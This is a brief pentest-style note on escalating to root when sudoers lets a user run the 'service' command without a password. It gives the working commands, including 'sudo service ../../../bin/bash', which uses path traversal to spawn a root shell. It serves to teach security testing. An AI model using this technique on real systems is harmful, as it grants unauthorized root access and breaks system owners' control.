Sudo (NOPASSWD) service - Privilege Escalation

If you ever get to run “service” command with root privileges, you can escape from restricted shell to root.

In this example /etc/sudoers has allowed an user to run this program as root without password need.

How to

1. sudo -l

2. Now that we know the command can be run without password need

  • sudo service ../../../bin/bash